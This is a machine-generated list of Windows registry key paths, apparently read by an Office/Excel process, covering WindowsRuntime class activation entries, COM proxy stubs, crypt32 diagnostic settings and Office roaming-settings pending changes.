HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\OfficeManagementState
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\CurrentSkuIdAggregationForApp\Excel
HKEY_CURRENT_USER\Control Panel\International\Geo\Name
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{878F3F2A-34DB-42CE-A02B-D637B10A89FF}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{66B59040-7C93-5F96-B52F-2C098D1557D0}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{E0798D3D-2B4A-589A-AB12-02DCCC158AFC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{57D369EE-7364-4AB0-A307-BDD25BCE408C}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{199E065C-8195-55DA-9C10-8AEAF9AC1062}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32\DiagMatchAnyMask
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\Knowledge
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\Placeholder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\Reset
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\2493ec62\718675225\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\2493ec62\718675225\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\2493ec62\718675225\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\2493ec62\718675225\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\2493ec62\718675225\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\32dbee8e\708966469\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\32dbee8e\708966469\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\32dbee8e\708966469\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\32dbee8e\708966469\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\32dbee8e\708966469\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\38cb8f49\393178352\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\38cb8f49\393178352\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\38cb8f49\393178352\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\38cb8f49\393178352\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\38cb8f49\393178352\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\3e866f52\-1604589325\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\3e866f52\-1604589325\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\3e866f52\-1604589325\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\3e866f52\-1604589325\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\3e866f52\-1604589325\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\489e7d9e\-1896733737\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\489e7d9e\-1896733737\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\489e7d9e\-1896733737\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\489e7d9e\-1896733737\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\50814ca4\-1347792945\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\50814ca4\-1347792945\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\50814ca4\-1347792945\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\50814ca4\-1347792945\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\50814ca4\-1347792945\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\562f8933\72733301\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\562f8933\72733301\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\562f8933\72733301\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\562f8933\72733301\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\562f8933\72733301\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5f2615e8\-1509960082\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5f2615e8\-1509960082\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5f2615e8\-1509960082\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5f2615e8\-1509960082\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5f2615e8\-1509960082\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5fd6a8ae\-1234042519\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5fd6a8ae\-1234042519\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5fd6a8ae\-1234042519\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5fd6a8ae\-1234042519\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\5fd6a8ae\-1234042519\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\66ddb580\1202881299\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\66ddb580\1202881299\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\66ddb580\1202881299\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\66ddb580\1202881299\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\66ddb580\1202881299\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\7560c652\-2104952903\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\7560c652\-2104952903\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\7560c652\-2104952903\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\7560c652\-2104952903\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\7560c652\-2104952903\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\813ae6b6\1439993264\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\813ae6b6\1439993264\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\813ae6b6\1439993264\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\813ae6b6\1439993264\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\813ae6b6\1439993264\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\842006b3\1931670735\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\842006b3\1931670735\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\842006b3\1931670735\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\842006b3\1931670735\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\842006b3\1931670735\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\8613774c\-819544651\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\8613774c\-819544651\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\8613774c\-819544651\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\8613774c\-819544651\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\8613774c\-819544651\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9314495b\-1647283665\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9314495b\-1647283665\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9314495b\-1647283665\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9314495b\-1647283665\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9314495b\-1647283665\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\988a9e8\-811380121\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\988a9e8\-811380121\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\988a9e8\-811380121\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\988a9e8\-811380121\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\988a9e8\-811380121\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9ef6541d\200742662\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9ef6541d\200742662\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9ef6541d\200742662\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9ef6541d\200742662\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\9ef6541d\200742662\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\a88935c4\8365587\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\a88935c4\8365587\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\a88935c4\8365587\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\a88935c4\8365587\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\a88935c4\8365587\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\aabebc6\417271860\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\aabebc6\417271860\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\aabebc6\417271860\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\aabebc6\417271860\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\aabebc6\417271860\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b3a19b73\-1511210859\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b3a19b73\-1511210859\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b3a19b73\-1511210859\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b3a19b73\-1511210859\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b3a19b73\-1511210859\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b7d248e0\707973128\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b7d248e0\707973128\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b7d248e0\707973128\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b7d248e0\707973128\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b7d248e0\707973128\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b8b6ef7a\35856241\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b8b6ef7a\35856241\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b8b6ef7a\35856241\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b8b6ef7a\35856241\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\b8b6ef7a\35856241\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c621e5f8\-1299563782\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c621e5f8\-1299563782\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c621e5f8\-1299563782\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c621e5f8\-1299563782\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c621e5f8\-1299563782\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c886cec6\1884667739\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c886cec6\1884667739\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c886cec6\1884667739\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c886cec6\1884667739\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c886cec6\1884667739\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c97901ac\1884492300\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c97901ac\1884492300\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c97901ac\1884492300\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c97901ac\1884492300\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\c97901ac\1884492300\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\deacd2e8\-239451978\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\deacd2e8\-239451978\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1258\{00000000-0000-0000-0000-000000000000}\PendingChanges\deacd2e8\-239451978\SortKey
